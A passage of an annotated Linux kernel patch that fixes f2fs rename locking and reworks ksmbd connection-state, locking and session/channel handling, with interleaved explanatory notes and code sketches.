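		unsigned long long key;
	};

	static void sample_insert(struct rb_root_cached *root,
				  struct sample_node *new)
	{
		struct rb_node **p = &root->rb_root.rb_node;
		struct rb_node *parent = NULL;
		bool leftmost = true;

		while (*p) {
			struct sample_node *cur;

			parent = *p;
			cur = rb_entry(parent, struct sample_node, rb);
			if (new->key < cur->key) {
				p = &(*p)->rb_left;
			} else {
				p = &(*p)->rb_right;
				leftmost = false;	/* no longer smallest key */
			}
		}
		rb_link_node(&new->rb, parent, p);
		rb_insert_color_cached(&new->rb, root, leftmost);
	}
]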
+diff --git a/fs/f2fs/gc.h b/fs/f2fs/gc.h
+index 19b956c2d697a..ca84024b9c9e7 100644
+--- a/fs/f2fs/gc.h
++++ b/fs/f2fs/gc.h
+@@ -55,20 +55,10 @@ struct gc_inode_list {
+ 	struct radix_tree_root iroot;
+ };
+ 
+-struct victim_info {
+-	unsigned long long mtime;	/* mtime of section */
+-	unsigned int segno;		/* section No. */
+-};
+-
+ struct victim_entry {
+ 	struct rb_node rb_node;		/* rb node located in rb-tree */
+-	union {
+-		struct {
+-			unsigned long long mtime;	/* mtime of section */
+-			unsigned int segno;		/* segment No. */
+-		};
+-		struct victim_info vi;	/* victim info */
+-	};
++	unsigned long long mtime;	/* mtime of section */
++	unsigned int segno;		/* segment No. */
+ 	struct list_head list;
+ };
+ 
+diff --git a/fs/f2fs/namei.c b/fs/f2fs/namei.c
+index 6032589099ce4..156b81daa0cb4 100644
+--- a/fs/f2fs/namei.c
++++ b/fs/f2fs/namei.c
+@@ -998,12 +998,20 @@ static int f2fs_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 			goto out;
+ 	}
+ 
++	/*
++	 * Copied from ext4_rename: we need to protect against old.inode
++	 * directory getting converted from inline directory format into
++	 * a normal one.
++	 */
++	if (S_ISDIR(old_inode->i_mode))
++		inode_lock_nested(old_inode, I_MUTEX_NONDIR2);
++
+ 	err = -ENOENT;
+ 	old_entry = f2fs_find_entry(old_dir, &old_dentry->d_name, &old_page);
+ 	if (!old_entry) {
+ 		if (IS_ERR(old_page))
+ 			err = PTR_ERR(old_page);
+-		goto out;
++		goto out_unlock_old;
+ 	}
+ 
+ 	if (S_ISDIR(old_inode->i_mode)) {
+@@ -1111,6 +1119,9 @@ static int f2fs_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 
+ 	f2fs_unlock_op(sbi);
+ 
++	if (S_ISDIR(old_inode->i_mode))
++		inode_unlock(old_inode);
++
+ 	if (IS_DIRSYNC(old_dir) || IS_DIRSYNC(new_dir))
+ 		f2fs_sync_fs(sbi->sb, 1);
+ 
+@@ -1125,6 +1136,9 @@ out_dir:
+ 		f2fs_put_page(old_dir_page, 0);
+ out_old:
+ 	f2fs_put_page(old_page, 0);
++out_unlock_old:
++	if (S_ISDIR(old_inode->i_mode))
++		inode_unlock(old_inode);
+ out:
+ 	iput(whiteout);
+ 	return err;
+diff --git a/fs/f2fs/segment.c b/fs/f2fs/segment.c
+index 06991cf643296..097b5e7231d0a 100644
+--- a/fs/f2fs/segment.c
++++ b/fs/f2fs/segment.c
+@@ -263,7 +263,7 @@ retry:
+ 	f2fs_put_dnode(&dn);
+ 
+ 	trace_f2fs_replace_atomic_write_block(inode, F2FS_I(inode)->cow_inode,
+-					index, *old_addr, new_addr, recover);
++			index, old_addr ? *old_addr : 0, new_addr, recover);
+ 	return 0;
+ }
+ 
+@@ -1487,7 +1487,7 @@ retry:
+ 			goto next;
+ 		if (unlikely(dcc->rbtree_check))
+ 			f2fs_bug_on(sbi, !f2fs_check_rb_tree_consistence(sbi,
+-							&dcc->root, false));
++							&dcc->root));
+ 		blk_start_plug(&plug);
+ 		list_for_each_entry_safe(dc, tmp, pend_list, list) {
+ 			f2fs_bug_on(sbi, dc->state != D_PREP);
+@@ -3003,7 +3003,7 @@ next:
+ 	mutex_lock(&dcc->cmd_lock);
+ 	if (unlikely(dcc->rbtree_check))
+ 		f2fs_bug_on(sbi, !f2fs_check_rb_tree_consistence(sbi,
+-							&dcc->root, false));
++							&dcc->root));
+ 
+ 	dc = (struct discard_cmd *)f2fs_lookup_rb_tree_ret(&dcc->root,
+ 					NULL, start,
+diff --git a/fs/fs-writeback.c b/fs/fs-writeback.c
+index 713e2d97935ff..909150a57aebb 100644
+--- a/fs/fs-writeback.c
++++ b/fs/fs-writeback.c
+@@ -829,7 +829,7 @@ void wbc_detach_inode(struct writeback_control *wbc)
+ 		 * is okay.  The main goal is avoiding keeping an inode on
+ 		 * the wrong wb for an extended period of time.
+ 		 */
+-		if (hweight32(history) > WB_FRN_HIST_THR_SLOTS)
++		if (hweight16(history) > WB_FRN_HIST_THR_SLOTS)
+ 			inode_switch_wbs(inode, max_id);
+ 	}
+ 
+diff --git a/fs/ksmbd/connection.c b/fs/ksmbd/connection.c
+index b8f9d627f241d..e3312fbf4c090 100644
+--- a/fs/ksmbd/connection.c
++++ b/fs/ksmbd/connection.c
+@@ -20,7 +20,7 @@ static DEFINE_MUTEX(init_lock);
+ static struct ksmbd_conn_ops default_conn_ops;
+ 
+ LIST_HEAD(conn_list);
+-DEFINE_RWLOCK(conn_list_lock);
++DECLARE_RWSEM(conn_list_lock);
+ 
+ /**
+  * ksmbd_conn_free() - free resources of the connection instance
+@@ -32,9 +32,9 @@ DEFINE_RWLOCK(conn_list_lock);
+  */
+ void ksmbd_conn_free(struct ksmbd_conn *conn)
+ {
+-	write_lock(&conn_list_lock);
++	down_write(&conn_list_lock);
+ 	list_del(&conn->conns_list);
+-	write_unlock(&conn_list_lock);
++	up_write(&conn_list_lock);
+ 
+ 	xa_destroy(&conn->sessions);
+ 	kvfree(conn->request_buf);
+@@ -56,7 +56,7 @@ struct ksmbd_conn *ksmbd_conn_alloc(void)
+ 		return NULL;
+ 
+ 	conn->need_neg = true;
+-	conn->status = KSMBD_SESS_NEW;
++	ksmbd_conn_set_new(conn);
+ 	conn->local_nls = load_nls("utf8");
+ 	if (!conn->local_nls)
+ 		conn->local_nls = load_nls_default();
+@@ -84,9 +84,9 @@ struct ksmbd_conn *ksmbd_conn_alloc(void)
+ 	spin_lock_init(&conn->llist_lock);
+ 	INIT_LIST_HEAD(&conn->lock_list);
+ 
+-	write_lock(&conn_list_lock);
++	down_write(&conn_list_lock);
+ 	list_add(&conn->conns_list, &conn_list);
+-	write_unlock(&conn_list_lock);
++	up_write(&conn_list_lock);
+ 	return conn;
+ }
+ 
+@@ -95,7 +95,7 @@ bool ksmbd_conn_lookup_dialect(struct ksmbd_conn *c)
+ 	struct ksmbd_conn *t;
+ 	bool ret = false;
+ 
+-	read_lock(&conn_list_lock);
++	down_read(&conn_list_lock);
+ 	list_for_each_entry(t, &conn_list, conns_list) {
+ 		if (memcmp(t->ClientGUID, c->ClientGUID, SMB2_CLIENT_GUID_SIZE))
+ 			continue;
+@@ -103,7 +103,7 @@ bool ksmbd_conn_lookup_dialect(struct ksmbd_conn *c)
+ 		ret = true;
+ 		break;
+ 	}
+-	read_unlock(&conn_list_lock);
++	up_read(&conn_list_lock);
+ 	return ret;
+ }
+ 
+@@ -149,19 +149,47 @@ int ksmbd_conn_try_dequeue_request(struct ksmbd_work *work)
+ 	return ret;
+ }
+ 
+-static void ksmbd_conn_lock(struct ksmbd_conn *conn)
++void ksmbd_conn_lock(struct ksmbd_conn *conn)
+ {
+ 	mutex_lock(&conn->srv_mutex);
+ }
+ 
+-static void ksmbd_conn_unlock(struct ksmbd_conn *conn)
++void ksmbd_conn_unlock(struct ksmbd_conn *conn)
+ {
+ 	mutex_unlock(&conn->srv_mutex);
+ }
+ 
+-void ksmbd_conn_wait_idle(struct ksmbd_conn *conn)
++void ksmbd_all_conn_set_status(u64 sess_id, u32 status)
+ {
++	struct ksmbd_conn *conn;
++
++	down_read(&conn_list_lock);
++	list_for_each_entry(conn, &conn_list, conns_list) {
++		if (conn->binding || xa_load(&conn->sessions, sess_id))
++			WRITE_ONCE(conn->status, status);
++	}
++	up_read(&conn_list_lock);
++}
++
++void ksmbd_conn_wait_idle(struct ksmbd_conn *conn, u64 sess_id)
++{
++	struct ksmbd_conn *bind_conn;
++
+ 	wait_event(conn->req_running_q, atomic_read(&conn->req_running) < 2);
++
++	down_read(&conn_list_lock);
++	list_for_each_entry(bind_conn, &conn_list, conns_list) {
++		if (bind_conn == conn)
++			continue;
++
++		if ((bind_conn->binding || xa_load(&bind_conn->sessions, sess_id)) &&
++		    !ksmbd_conn_releasing(bind_conn) &&
++		    atomic_read(&bind_conn->req_running)) {
++			wait_event(bind_conn->req_running_q,
++				atomic_read(&bind_conn->req_running) == 0);
++		}
++	}
++	up_read(&conn_list_lock);
+ }
+ 
+ int ksmbd_conn_write(struct ksmbd_work *work)
+@@ -245,7 +273,7 @@ bool ksmbd_conn_alive(struct ksmbd_conn *conn)
+ 	if (!ksmbd_server_running())
+ 		return false;
+ 
+-	if (conn->status == KSMBD_SESS_EXITING)
++	if (ksmbd_conn_exiting(conn))
+ 		return false;
+ 
+ 	if (kthread_should_stop())
+@@ -305,7 +333,7 @@ int ksmbd_conn_handler_loop(void *p)
+ 		pdu_size = get_rfc1002_len(hdr_buf);
+ 		ksmbd_debug(CONN, "RFC1002 header %u bytes\n", pdu_size);
+ 
+-		if (conn->status == KSMBD_SESS_GOOD)
++		if (ksmbd_conn_good(conn))
+ 			max_allowed_pdu_size =
+ 				SMB3_MAX_MSGSIZE + conn->vals->max_write_size;
+ 		else
+@@ -314,7 +342,7 @@ int ksmbd_conn_handler_loop(void *p)
+ 		if (pdu_size > max_allowed_pdu_size) {
+ 			pr_err_ratelimited("PDU length(%u) excceed maximum allowed pdu size(%u) on connection(%d)\n",
+ 					pdu_size, max_allowed_pdu_size,
+-					conn->status);
++					READ_ONCE(conn->status));
+ 			break;
+ 		}
+ 
+@@ -362,10 +390,10 @@ int ksmbd_conn_handler_loop(void *p)
+ 	}
+ 
+ out:
++	ksmbd_conn_set_releasing(conn);
+ 	/* Wait till all reference dropped to the Server object*/
+ 	wait_event(conn->r_count_q, atomic_read(&conn->r_count) == 0);
+ 
+-
+ 	if (IS_ENABLED(CONFIG_UNICODE))
+ 		utf8_unload(conn->um);
+ 	unload_nls(conn->local_nls);
+@@ -409,7 +437,7 @@ static void stop_sessions(void)
+ 	struct ksmbd_transport *t;
+ 
+ again:
+-	read_lock(&conn_list_lock);
++	down_read(&conn_list_lock);
+ 	list_for_each_entry(conn, &conn_list, conns_list) {
+ 		struct task_struct *task;
+ 
+@@ -418,14 +446,14 @@ again:
+ 		if (task)
+ 			ksmbd_debug(CONN, "Stop session handler %s/%d\n",
+ 				    task->comm, task_pid_nr(task));
+-		conn->status = KSMBD_SESS_EXITING;
++		ksmbd_conn_set_exiting(conn);
+ 		if (t->ops->shutdown) {
+-			read_unlock(&conn_list_lock);
++			up_read(&conn_list_lock);
+ 			t->ops->shutdown(t);
+-			read_lock(&conn_list_lock);
++			down_read(&conn_list_lock);
+ 		}
+ 	}
+-	read_unlock(&conn_list_lock);
++	up_read(&conn_list_lock);
+ 
+ 	if (!list_empty(&conn_list)) {
+ 		schedule_timeout_interruptible(HZ / 10); /* 100ms */
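[Note: conn_list_lock changes from rwlock_t to rw_semaphore because readers now sleep while holding it — ksmbd_conn_wait_idle() calls wait_event() under the lock, which is illegal under a spinning read_lock(). The shape of the new readers, as a sketch:

	down_read(&conn_list_lock);	/* rw_semaphore: sleeping is allowed */
	list_for_each_entry(bind_conn, &conn_list, conns_list) {
		/* ... */
		wait_event(bind_conn->req_running_q,	/* may sleep here */
			   atomic_read(&bind_conn->req_running) == 0);
	}
	up_read(&conn_list_lock);
]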
+diff --git a/fs/ksmbd/connection.h b/fs/ksmbd/connection.h
+index 0e3a848defaf3..ad8dfaa48ffb3 100644
+--- a/fs/ksmbd/connection.h
++++ b/fs/ksmbd/connection.h
+@@ -26,7 +26,8 @@ enum {
+ 	KSMBD_SESS_GOOD,
+ 	KSMBD_SESS_EXITING,
+ 	KSMBD_SESS_NEED_RECONNECT,
+-	KSMBD_SESS_NEED_NEGOTIATE
++	KSMBD_SESS_NEED_NEGOTIATE,
++	KSMBD_SESS_RELEASING
+ };
+ 
+ struct ksmbd_stats {
+@@ -140,10 +141,10 @@ struct ksmbd_transport {
+ #define KSMBD_TCP_PEER_SOCKADDR(c)	((struct sockaddr *)&((c)->peer_addr))
+ 
+ extern struct list_head conn_list;
+-extern rwlock_t conn_list_lock;
++extern struct rw_semaphore conn_list_lock;
+ 
+ bool ksmbd_conn_alive(struct ksmbd_conn *conn);
+-void ksmbd_conn_wait_idle(struct ksmbd_conn *conn);
++void ksmbd_conn_wait_idle(struct ksmbd_conn *conn, u64 sess_id);
+ struct ksmbd_conn *ksmbd_conn_alloc(void);
+ void ksmbd_conn_free(struct ksmbd_conn *conn);
+ bool ksmbd_conn_lookup_dialect(struct ksmbd_conn *c);
+@@ -162,6 +163,8 @@ void ksmbd_conn_init_server_callbacks(struct ksmbd_conn_ops *ops);
+ int ksmbd_conn_handler_loop(void *p);
+ int ksmbd_conn_transport_init(void);
+ void ksmbd_conn_transport_destroy(void);
++void ksmbd_conn_lock(struct ksmbd_conn *conn);
++void ksmbd_conn_unlock(struct ksmbd_conn *conn);
+ 
+ /*
+  * WARNING
+@@ -169,43 +172,60 @@ void ksmbd_conn_transport_destroy(void);
+  * This is a hack. We will move status to a proper place once we land
+  * a multi-sessions support.
+  */
+-static inline bool ksmbd_conn_good(struct ksmbd_work *work)
++static inline bool ksmbd_conn_good(struct ksmbd_conn *conn)
+ {
+-	return work->conn->status == KSMBD_SESS_GOOD;
++	return READ_ONCE(conn->status) == KSMBD_SESS_GOOD;
+ }
+ 
+-static inline bool ksmbd_conn_need_negotiate(struct ksmbd_work *work)
++static inline bool ksmbd_conn_need_negotiate(struct ksmbd_conn *conn)
+ {
+-	return work->conn->status == KSMBD_SESS_NEED_NEGOTIATE;
++	return READ_ONCE(conn->status) == KSMBD_SESS_NEED_NEGOTIATE;
+ }
+ 
+-static inline bool ksmbd_conn_need_reconnect(struct ksmbd_work *work)
++static inline bool ksmbd_conn_need_reconnect(struct ksmbd_conn *conn)
+ {
+-	return work->conn->status == KSMBD_SESS_NEED_RECONNECT;
++	return READ_ONCE(conn->status) == KSMBD_SESS_NEED_RECONNECT;
+ }
+ 
+-static inline bool ksmbd_conn_exiting(struct ksmbd_work *work)
++static inline bool ksmbd_conn_exiting(struct ksmbd_conn *conn)
+ {
+-	return work->conn->status == KSMBD_SESS_EXITING;
++	return READ_ONCE(conn->status) == KSMBD_SESS_EXITING;
+ }
+ 
+-static inline void ksmbd_conn_set_good(struct ksmbd_work *work)
++static inline bool ksmbd_conn_releasing(struct ksmbd_conn *conn)
+ {
+-	work->conn->status = KSMBD_SESS_GOOD;
++	return READ_ONCE(conn->status) == KSMBD_SESS_RELEASING;
+ }
+ 
+-static inline void ksmbd_conn_set_need_negotiate(struct ksmbd_work *work)
++static inline void ksmbd_conn_set_new(struct ksmbd_conn *conn)
+ {
+-	work->conn->status = KSMBD_SESS_NEED_NEGOTIATE;
++	WRITE_ONCE(conn->status, KSMBD_SESS_NEW);
+ }
+ 
+-static inline void ksmbd_conn_set_need_reconnect(struct ksmbd_work *work)
++static inline void ksmbd_conn_set_good(struct ksmbd_conn *conn)
+ {
+-	work->conn->status = KSMBD_SESS_NEED_RECONNECT;
++	WRITE_ONCE(conn->status, KSMBD_SESS_GOOD);
+ }
+ 
+-static inline void ksmbd_conn_set_exiting(struct ksmbd_work *work)
++static inline void ksmbd_conn_set_need_negotiate(struct ksmbd_conn *conn)
+ {
+-	work->conn->status = KSMBD_SESS_EXITING;
++	WRITE_ONCE(conn->status, KSMBD_SESS_NEED_NEGOTIATE);
+ }
++
++static inline void ksmbd_conn_set_need_reconnect(struct ksmbd_conn *conn)
++{
++	WRITE_ONCE(conn->status, KSMBD_SESS_NEED_RECONNECT);
++}
++
++static inline void ksmbd_conn_set_exiting(struct ksmbd_conn *conn)
++{
++	WRITE_ONCE(conn->status, KSMBD_SESS_EXITING);
++}
++
++static inline void ksmbd_conn_set_releasing(struct ksmbd_conn *conn)
++{
++	WRITE_ONCE(conn->status, KSMBD_SESS_RELEASING);
++}
++
++void ksmbd_all_conn_set_status(u64 sess_id, u32 status);
+ #endif /* __CONNECTION_H__ */
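[Note: all connection-state transitions now funnel through these helpers, so every access is a READ_ONCE()/WRITE_ONCE() pair and lockless checks such as ksmbd_conn_alive() no longer constitute data races. A hypothetical caller, for illustration only:

	if (!ksmbd_conn_good(conn))		/* READ_ONCE under the hood */
		return -EINVAL;
	/* ... */
	ksmbd_conn_set_need_reconnect(conn);	/* WRITE_ONCE under the hood */
]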
+diff --git a/fs/ksmbd/mgmt/tree_connect.c b/fs/ksmbd/mgmt/tree_connect.c
+index f19de20c2960c..f07a05f376513 100644
+--- a/fs/ksmbd/mgmt/tree_connect.c
++++ b/fs/ksmbd/mgmt/tree_connect.c
+@@ -137,6 +137,9 @@ int ksmbd_tree_conn_session_logoff(struct ksmbd_session *sess)
+ 	struct ksmbd_tree_connect *tc;
+ 	unsigned long id;
+ 
++	if (!sess)
++		return -EINVAL;
++
+ 	xa_for_each(&sess->tree_conns, id, tc)
+ 		ret |= ksmbd_tree_conn_disconnect(sess, tc);
+ 	xa_destroy(&sess->tree_conns);
+diff --git a/fs/ksmbd/mgmt/user_session.c b/fs/ksmbd/mgmt/user_session.c
+index 92b1603b5abeb..ea4b56d570fbb 100644
+--- a/fs/ksmbd/mgmt/user_session.c
++++ b/fs/ksmbd/mgmt/user_session.c
+@@ -30,15 +30,15 @@ struct ksmbd_session_rpc {
+ 
+ static void free_channel_list(struct ksmbd_session *sess)
+ {
+-	struct channel *chann, *tmp;
++	struct channel *chann;
++	unsigned long index;
+ 
+-	write_lock(&sess->chann_lock);
+-	list_for_each_entry_safe(chann, tmp, &sess->ksmbd_chann_list,
+-				 chann_list) {
+-		list_del(&chann->chann_list);
++	xa_for_each(&sess->ksmbd_chann_list, index, chann) {
++		xa_erase(&sess->ksmbd_chann_list, index);
+ 		kfree(chann);
+ 	}
+-	write_unlock(&sess->chann_lock);
++
++	xa_destroy(&sess->ksmbd_chann_list);
+ }
+ 
+ static void __session_rpc_close(struct ksmbd_session *sess,
+@@ -153,10 +153,6 @@ void ksmbd_session_destroy(struct ksmbd_session *sess)
+ 	if (!sess)
+ 		return;
+ 
+-	down_write(&sessions_table_lock);
+-	hash_del(&sess->hlist);
+-	up_write(&sessions_table_lock);
+-
+ 	if (sess->user)
+ 		ksmbd_free_user(sess->user);
+ 
+@@ -174,76 +170,101 @@ static struct ksmbd_session *__session_lookup(unsigned long long id)
+ 	struct ksmbd_session *sess;
+ 
+ 	hash_for_each_possible(sessions_table, sess, hlist, id) {
+-		if (id == sess->id)
++		if (id == sess->id) {
++			sess->last_active = jiffies;
+ 			return sess;
++		}
+ 	}
+ 	return NULL;
+ }
+ 
++static void ksmbd_expire_session(struct ksmbd_conn *conn)
++{
++	unsigned long id;
++	struct ksmbd_session *sess;
++
++	down_write(&sessions_table_lock);
++	xa_for_each(&conn->sessions, id, sess) {
++		if (sess->state != SMB2_SESSION_VALID ||
++		    time_after(jiffies,
++			       sess->last_active + SMB2_SESSION_TIMEOUT)) {
++			xa_erase(&conn->sessions, sess->id);
++			hash_del(&sess->hlist);
++			ksmbd_session_destroy(sess);
++			continue;
++		}
++	}
++	up_write(&sessions_table_lock);
++}
++
+ int ksmbd_session_register(struct ksmbd_conn *conn,
+ 			   struct ksmbd_session *sess)
+ {
+ 	sess->dialect = conn->dialect;
+ 	memcpy(sess->ClientGUID, conn->ClientGUID, SMB2_CLIENT_GUID_SIZE);
++	ksmbd_expire_session(conn);
+ 	return xa_err(xa_store(&conn->sessions, sess->id, sess, GFP_KERNEL));
+ }
+ 
+ static int ksmbd_chann_del(struct ksmbd_conn *conn, struct ksmbd_session *sess)
+ {
+-	struct channel *chann, *tmp;
+-
+-	write_lock(&sess->chann_lock);
+-	list_for_each_entry_safe(chann, tmp, &sess->ksmbd_chann_list,
+-				 chann_list) {
+-		if (chann->conn == conn) {
+-			list_del(&chann->chann_list);
+-			kfree(chann);
+-			write_unlock(&sess->chann_lock);
+-			return 0;
+-		}
+-	}
+-	write_unlock(&sess->chann_lock);
++	struct channel *chann;
+ 
+-	return -ENOENT;
++	chann = xa_erase(&sess->ksmbd_chann_list, (long)conn);
++	if (!chann)
++		return -ENOENT;
++
++	kfree(chann);
++	return 0;
+ }
+ 
+ void ksmbd_sessions_deregister(struct ksmbd_conn *conn)
+ {
+ 	struct ksmbd_session *sess;
++	unsigned long id;
+ 
++	down_write(&sessions_table_lock);
+ 	if (conn->binding) {
+ 		int bkt;
++		struct hlist_node *tmp;
+ 
+-		down_write(&sessions_table_lock);
+-		hash_for_each(sessions_table, bkt, sess, hlist) {
+-			if (!ksmbd_chann_del(conn, sess)) {
+-				up_write(&sessions_table_lock);
+-				goto sess_destroy;
++		hash_for_each_safe(sessions_table, bkt, tmp, sess, hlist) {
++			if (!ksmbd_chann_del(conn, sess) &&
++			    xa_empty(&sess->ksmbd_chann_list)) {
++				hash_del(&sess->hlist);
++				ksmbd_session_destroy(sess);
+ 			}
+ 		}
+-		up_write(&sessions_table_lock);
+-	} else {
+-		unsigned long id;
+-
+-		xa_for_each(&conn->sessions, id, sess) {
+-			if (!ksmbd_chann_del(conn, sess))
+-				goto sess_destroy;
+-		}
+ 	}
+ 
+-	return;
++	xa_for_each(&conn->sessions, id, sess) {
++		unsigned long chann_id;
++		struct channel *chann;
++
++		xa_for_each(&sess->ksmbd_chann_list, chann_id, chann) {
++			if (chann->conn != conn)
++				ksmbd_conn_set_exiting(chann->conn);
++		}
+ 
+-sess_destroy:
+-	if (list_empty(&sess->ksmbd_chann_list)) {
+-		xa_erase(&conn->sessions, sess->id);
+-		ksmbd_session_destroy(sess);
++		ksmbd_chann_del(conn, sess);
++		if (xa_empty(&sess->ksmbd_chann_list)) {
++			xa_erase(&conn->sessions, sess->id);
++			hash_del(&sess->hlist);
++			ksmbd_session_destroy(sess);
++		}
+ 	}
++	up_write(&sessions_table_lock);
+ }
+ 
+ struct ksmbd_session *ksmbd_session_lookup(struct ksmbd_conn *conn,
+ 					   unsigned long long id)
+ {
+-	return xa_load(&conn->sessions, id);
++	struct ksmbd_session *sess;
++
++	sess = xa_load(&conn->sessions, id);
++	if (sess)
++		sess->last_active = jiffies;
++	return sess;
+ }
+ 
+ struct ksmbd_session *ksmbd_session_lookup_slowpath(unsigned long long id)
+@@ -252,6 +273,8 @@ struct ksmbd_session *ksmbd_session_lookup_slowpath(unsigned long long id)
+ 
+ 	down_read(&sessions_table_lock);
+ 	sess = __session_lookup(id);
++	if (sess)
++		sess->last_active = jiffies;
+ 	up_read(&sessions_table_lock);
+ 
+ 	return sess;
+@@ -320,6 +343,9 @@ static struct ksmbd_session *__session_create(int protocol)
+ 	struct ksmbd_session *sess;
+ 	int ret;
+ 
++	if (protocol != CIFDS_SESSION_FLAG_SMB2)
++		return NULL;
++
+ 	sess = kzalloc(sizeof(struct ksmbd_session), GFP_KERNEL);
+ 	if (!sess)
+ 		return NULL;
+@@ -327,32 +353,24 @@ static struct ksmbd_session *__session_create(int protocol)
+ 	if (ksmbd_init_file_table(&sess->file_table))
+ 		goto error;
+ 
++	sess->last_active = jiffies;
++	sess->state = SMB2_SESSION_IN_PROGRESS;
+ 	set_session_flag(sess, protocol);
+ 	xa_init(&sess->tree_conns);
+-	INIT_LIST_HEAD(&sess->ksmbd_chann_list);
++	xa_init(&sess->ksmbd_chann_list);
+ 	INIT_LIST_HEAD(&sess->rpc_handle_list);
+ 	sess->sequence_number = 1;
+-	rwlock_init(&sess->chann_lock);
+-
+-	switch (protocol) {
+-	case CIFDS_SESSION_FLAG_SMB2:
+-		ret = __init_smb2_session(sess);
+-		break;
+-	default:
+-		ret = -EINVAL;
+-		break;
+-	}
+ 
++	ret = __init_smb2_session(sess);
+ 	if (ret)
+ 		goto error;
+ 
+ 	ida_init(&sess->tree_conn_ida);
+ 
+-	if (protocol == CIFDS_SESSION_FLAG_SMB2) {
+-		down_write(&sessions_table_lock);
+-		hash_add(sessions_table, &sess->hlist, sess->id);
+-		up_write(&sessions_table_lock);
+-	}
++	down_write(&sessions_table_lock);
++	hash_add(sessions_table, &sess->hlist, sess->id);
++	up_write(&sessions_table_lock);
++
+ 	return sess;
+ 
+ error:
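[Note: the channel list becomes an xarray indexed by the connection pointer value, which gives lockless lookup and drops the old chann_lock entirely. A self-contained sketch of the pattern used above — names are illustrative, not from the patch:

	#include <linux/xarray.h>

	static DEFINE_XARRAY(chann_xa);		/* index = conn pointer value */

	static int chann_add(struct ksmbd_conn *conn, struct channel *chann)
	{
		/* xa_store() returns the displaced entry or an XA_ERROR
		 * pointer; xa_err() extracts 0 or the negative errno. */
		return xa_err(xa_store(&chann_xa, (unsigned long)conn,
				       chann, GFP_KERNEL));
	}

	static struct channel *chann_lookup(struct ksmbd_conn *conn)
	{
		return xa_load(&chann_xa, (unsigned long)conn);
	}

	static int chann_del(struct ksmbd_conn *conn)
	{
		struct channel *chann = xa_erase(&chann_xa,
						 (unsigned long)conn);

		if (!chann)
			return -ENOENT;
		kfree(chann);
		return 0;
	}
]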
+diff --git a/fs/ksmbd/mgmt/user_session.h b/fs/ksmbd/mgmt/user_session.h
+index 8934b8ee275ba..51f38e5b61abb 100644
+--- a/fs/ksmbd/mgmt/user_session.h
++++ b/fs/ksmbd/mgmt/user_session.h
+@@ -21,7 +21,6 @@ struct ksmbd_file_table;
+ struct channel {
+ 	__u8			smb3signingkey[SMB3_SIGN_KEY_SIZE];
+ 	struct ksmbd_conn	*conn;
+-	struct list_head	chann_list;
+ };
+ 
+ struct preauth_session {
+@@ -50,8 +49,7 @@ struct ksmbd_session {
+ 	char				sess_key[CIFS_KEY_SIZE];
+ 
+ 	struct hlist_node		hlist;
+-	rwlock_t			chann_lock;
+-	struct list_head		ksmbd_chann_list;
++	struct xarray			ksmbd_chann_list;
+ 	struct xarray			tree_conns;
+ 	struct ida			tree_conn_ida;
+ 	struct list_head		rpc_handle_list;
+@@ -61,6 +59,7 @@ struct ksmbd_session {
+ 	__u8				smb3signingkey[SMB3_SIGN_KEY_SIZE];
+ 
+ 	struct ksmbd_file_table		file_table;
++	unsigned long			last_active;
+ };
+ 
+ static inline int test_session_flag(struct ksmbd_session *sess, int bit)
+diff --git a/fs/ksmbd/server.c b/fs/ksmbd/server.c
+index cd8a873347a79..dc76d7cf241f0 100644
+--- a/fs/ksmbd/server.c
++++ b/fs/ksmbd/server.c
+@@ -93,7 +93,8 @@ static inline int check_conn_state(struct ksmbd_work *work)
+ {
+ 	struct smb_hdr *rsp_hdr;
+ 
+-	if (ksmbd_conn_exiting(work) || ksmbd_conn_need_reconnect(work)) {
++	if (ksmbd_conn_exiting(work->conn) ||
++	    ksmbd_conn_need_reconnect(work->conn)) {
+ 		rsp_hdr = work->response_buf;
+ 		rsp_hdr->Status.CifsError = STATUS_CONNECTION_DISCONNECTED;
+ 		return 1;
+diff --git a/fs/ksmbd/smb2pdu.c b/fs/ksmbd/smb2pdu.c
+index decaef3592f43..53badff17efaa 100644
+--- a/fs/ksmbd/smb2pdu.c
++++ b/fs/ksmbd/smb2pdu.c
+@@ -74,14 +74,7 @@ static inline bool check_session_id(struct ksmbd_conn *conn, u64 id)
+ 
+ struct channel *lookup_chann_list(struct ksmbd_session *sess, struct ksmbd_conn *conn)
+ {
+-	struct channel *chann;
+-
+-	list_for_each_entry(chann, &sess->ksmbd_chann_list, chann_list) {
+-		if (chann->conn == conn)
+-			return chann;
+-	}
+-
+-	return NULL;
++	return xa_load(&sess->ksmbd_chann_list, (long)conn);
+ }
+ 
+ /**
+@@ -254,7 +247,7 @@ int init_smb2_neg_rsp(struct ksmbd_work *work)
+ 
+ 	rsp = smb2_get_msg(work->response_buf);
+ 
+-	WARN_ON(ksmbd_conn_good(work));
++	WARN_ON(ksmbd_conn_good(conn));
+ 
+ 	rsp->StructureSize = cpu_to_le16(65);
+ 	ksmbd_debug(SMB, "conn->dialect 0x%x\n", conn->dialect);
+@@ -284,7 +277,7 @@ int init_smb2_neg_rsp(struct ksmbd_work *work)
+ 		rsp->SecurityMode |= SMB2_NEGOTIATE_SIGNING_REQUIRED_LE;
+ 	conn->use_spnego = true;
+ 
+-	ksmbd_conn_set_need_negotiate(work);
++	ksmbd_conn_set_need_negotiate(conn);
+ 	return 0;
+ }
+ 
+@@ -574,7 +567,7 @@ int smb2_check_user_session(struct ksmbd_work *work)
+ 	    cmd == SMB2_SESSION_SETUP_HE)
+ 		return 0;
+ 
+-	if (!ksmbd_conn_good(work))
++	if (!ksmbd_conn_good(conn))
+ 		return -EINVAL;
+ 
+ 	sess_id = le64_to_cpu(req_hdr->SessionId);
+@@ -592,6 +585,7 @@ static void destroy_previous_session(struct ksmbd_conn *conn,
+ 	struct ksmbd_session *prev_sess = ksmbd_session_lookup_slowpath(id);
+ 	struct ksmbd_user *prev_user;
+ 	struct channel *chann;
++	long index;
+ 
+ 	if (!prev_sess)
+ 		return;
+@@ -605,10 +599,8 @@ static void destroy_previous_session(struct ksmbd_conn *conn,
+ 		return;
+ 
+ 	prev_sess->state = SMB2_SESSION_EXPIRED;
+-	write_lock(&prev_sess->chann_lock);
+-	list_for_each_entry(chann, &prev_sess->ksmbd_chann_list, chann_list)
+-		chann->conn->status = KSMBD_SESS_EXITING;
+-	write_unlock(&prev_sess->chann_lock);
++	xa_for_each(&prev_sess->ksmbd_chann_list, index, chann)
++		ksmbd_conn_set_exiting(chann->conn);
+ }
+ 
+ /**
+@@ -1075,7 +1067,7 @@ int smb2_handle_negotiate(struct ksmbd_work *work)
+ 
